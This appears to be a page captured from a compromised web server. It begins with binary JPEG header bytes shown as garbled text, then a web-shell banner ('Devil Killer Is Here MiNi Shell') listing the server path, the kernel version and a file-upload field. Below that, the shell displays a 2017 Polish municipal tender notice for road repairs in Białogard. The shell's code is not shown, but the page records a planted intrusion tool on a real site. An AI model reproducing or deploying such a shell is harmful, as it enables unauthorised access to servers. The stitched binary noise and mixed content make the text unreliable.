JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170413/65442-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.bialogard.info' target='_blank'>http://bip.bialogard.info</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 65442 - 2017
              z dnia 2017-04-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Białogard: Remonty ulic o nawierzchniach nieutwardzonych i utwardzonych na terenie miasta Białogard w 2017 roku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Białogard - Urząd Miasta Białogard, krajowy numer identyfikacyjny
              330920452, ul.
              1-go Maja 
              18,
              78-200 
              Białogard, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              943122310, e-mail
              um.sekretariat@bialogard.info, faks
              .
              <br />
              Adres strony internetowej (URL): http://bip.bialogard.info<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.bialogard.info</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.bialogard.info</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty składa się pod rygorem nieważności w formie pisemnej<br />
                Adres:
                <br />Urząd Miasta Białogard - Sekretariat (pok. 224), ul. 1 Maja 18, 78-200 Białogard</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remonty ulic o nawierzchniach nieutwardzonych i utwardzonych na terenie miasta Białogard w 2017 roku<br /><b>Numer referencyjny: </b>IZP.271.1.4.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są roboty budowlane polegające na remontach nawierzchni nieutwardzonych          i utwardzonych na terenie miasta Białogard w 2017 r.
Zamówienie podzielone jest na dwie części  i obejmuje w szczególności:
Część nr 1  Remont nawierzchni nieutwardzonych według poniższej technologii:
Remont nawierzchni drogi bez doziarnienia:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie               w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                    i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca.
Remont nawierzchni drogi z doziarnieniem żużlem w ilości 30 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie              w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                      i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego: 
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia żużlem w ilości 30 kg/m2 i uwałowanie przy zastosowaniu walca.
Remont nawierzchni drogi z doziarnieniem kruszywem frakcji 0-31,5 mm w ilości                 30 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie               w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                         i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia kruszywem frakcji 0-31,5 mm w ilości 30 kg/m2 i uwałowanie przy zastosowaniu walca.
Wykonanie nawierzchni z kruszywa frakcji 0-31,5 mm gr. 5 cm:
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%,
uwałowanie przy zastosowaniu walca,
ułożenie nawierzchni z kruszywa frakcji 0-31,5 mm gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca.
Wykonanie nawierzchni z gruzu budowlanego gr. 5 cm:                                                                                                                                        
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Wykonanie nawierzchni z gruzu budowlanego gr. 10 cm:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 10 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Ułożenie płyt drogowych (materiał Inwestora) o wym. 3 m x 1,5 m na podsypce piaskowej    gr. 10 cm z dowozem na odległość do 3 km:
korytowanie na głębokości 25 cm,
położenie warstwy odsączającej z piasku gr. 10 cm,
położenie płyt drogowych.
Ułożenie płyt drogowych (materiał Wykonawcy) o wym. 3 m x 1,5 m na podsypce piaskowej gr. 10 cm:
korytowanie na głębokości 25 cm,
położenie warstwy odsączającej z piasku gr. 10 cm,
położenie płyt drogowych.
Regulacja krawężnika:
rozbiórka i ponowne ułożenie krawężnika na podsypce cementowo-piaskowej,
Ułożenie kostki betonowej-brukowej gr. 8 cm na podbudowie:
korytowanie na gł. 30 cm i wywóz,
warstwa odsączającą z piasku gr. 10 cm,
warstwa kruszywa łamanego o frakcji 0-31,5 mm gr. 15 cm,
podsypka cementowo-piaskowa gr. 3 cm w stosunku 1:4,
ułożenie kostki betonowej-brukowej gr. 8 cm,
Remont nawierzchni drogi z doziarnieniem żużlem w ilości 10 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie            w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                   i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia żużlem w ilości 10 kg/m2 i uwałowanie przy zastosowaniu walca,
Remont nawierzchni drogi z doziarnieniem kruszywem frakcji 0-31,5 mm w ilości 10 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie           w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                   i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia kruszywem frakcji 0-31,5 mm w ilości 10 kg/m2 i uwałowanie przy zastosowaniu walca,
Regulacja płyt typu IOMB:
rozbiórka płyt typu IOMB,
wykonanie podsypki piaskowej gr. 10 cm,
ponowne ułożenie płyt,
Wykonanie nawierzchni z gruzu budowlanego gr. 5 cm (materiał Inwestora):
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Wykonanie nawierzchni z gruzu budowlanego gr. 10 cm (materiał Inwestora):
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 10 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca.
Część nr 2  Remont nawierzchni utwardzonych według poniższej technologii:
Rozbiórka istniejącej nawierzchni: z kostki betonowej-brukowej gr. 6 cm i 8 cm, płytek 50x50x7 lub 35x35x5:
podsypka piaskowa gr. 5-10 cm,
ułożenie nawierzchni w przeliczeniu na 1 m2 z kostki betonowej-brukowej, płytek o wym. jw.,
Rozbiórka nawierzchni z trylinki gr. 12-15 cm,
podsypka piaskowa gr. 5 cm,
podsypka cementowo-piaskowa gr. 15 cm,
ponowne ułożenie trylinki w przeliczeniu na 1 m2,
Rozbiórka nawierzchni z płytek 35x35x5:
podsypka piaskowa gr. 5-10 cm,
ułożenie nawierzchni z kostki betonowej-brukowej gr. 6 cm, w przeliczeniu na 1 m2,
Rozbiórka nawierzchni z kamienia:
wykonanie koryta o gł. 10 cm,
wykonanie podsypki cementowo-piaskowej gr. 10 cm,
ułożenie kostki kamiennej (kamienia brukowego),
Ułożenie krawężnika na ławie betonowej z oporem  1 mb,
Ułożenie krawężnika na ławie betonowej zwykłej  1 mb,
Ułożenie obrzeża na podsypce piaskowej  1 mb,
Wykonanie podsypki piaskowej gr. 5 cm,
Wykonanie podsypki piaskowej gr.10 cm,
Rozbiórka nawierzchni bitumicznej gr. 4 cm,
Rozbiórka krawężnika na ławie betonowej,
Korytowanie gr. 5 cm,
Korytowanie gr. 10 cm.
Dodatkowe wymogi:
wykonywanie robót budowlanych będzie odbywało się na podstawie odrębnych zleceń Zamawiającego.
Zamawiający wskaże Wykonawcy ulice wymagające remontu oraz określi zakres i termin wykonania remontu poszczególnych ulic. 
<br /><br /><b>II.5) Główny kod CPV: </b>45233140-2<br /><b> Dodatkowe kody CPV:</b>45233142-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek dotyczący części nr 1:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał zgodnie ze sztuką budowlaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, 
co najmniej dwie roboty budowlane podobne do objętej przedmiotem zamówienia o wartości nie mniejszej niż 50 000,00 PLN brutto każda, polegające na:
budowie lub remoncie drogi o nawierzchni nieutwardzonej.
Warunek dotyczący części nr 2:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał zgodnie ze sztuką budowlaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie roboty budowlane podobne do objętej przedmiotem zamówienia o wartości nie mniejszej niż 50 000,00 PLN brutto każda, polegające na:
budowie lub remoncie drogi o nawierzchni utwardzonej.
Warunek dotyczący części nr 1 i 2:
Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą do kierowania robotami budowlanymi w specjalności drogowej.  
Warunek dotyczący części nr 1:
Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje 
lub będzie dysponował co najmniej:
walcem stalowym z wibracją 8  10 ton  1 szt.,
walcem gumowo  stalowym 10  12 ton  1 szt.
Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zamawiający wymaga aby w wykazie osób wskazano, która z wymienionych w pkt osób pełniła będzie funkcję kierownika budowy, ponadto od osób tych wymagane jest minimum 3-letnie doświadczenie zawodowe (liczone od dnia uzyskania uprawnień) w kierowaniu robotami danej specjalności, przy czym zasadą jest, że nakładające się 
na siebie okresy kierowania robotami nie sumują się. Warunek zostanie uznany za spełniony również wtedy, gdy Wykonawca dysponował będzie osobą, która łącznie posiadać będzie uprawnienia oraz doświadczenie, o którym mowa powyżej.Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. 
z 2016, poz. 290 ze zm.) osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z ich treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.
W związku z powyższym, Zamawiający zaakceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65). Wszystkie osoby przewidziane do realizacji zamówienia muszą biegle posługiwać się językiem polskim. W przeciwnym wypadku Wykonawca zobowiązany jest do udostępnienia wystarczającej liczby kompetentnych tłumaczy, wykazujących znajomość języka technicznego w zakresie terminologii budowlanej, we wszystkich specjalnościach występujących przy realizacji zamówienia.
W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt 4.2.3.3 SIWZ musi spełniać co najmniej jeden Wykonawca samodzielnie lub wszyscy Wykonawcy łącznie, zaś warunek określony w pkt 4.2.3.1 SIWZ i 4.2.3.2 SIWZ musi spełniać co najmniej jeden Wykonawca samodzielnie.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz                      z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych 
lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, 
że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
lub wstrzymanie w całości wykonania decyzji właściwego organu;
3. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
4. oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa 
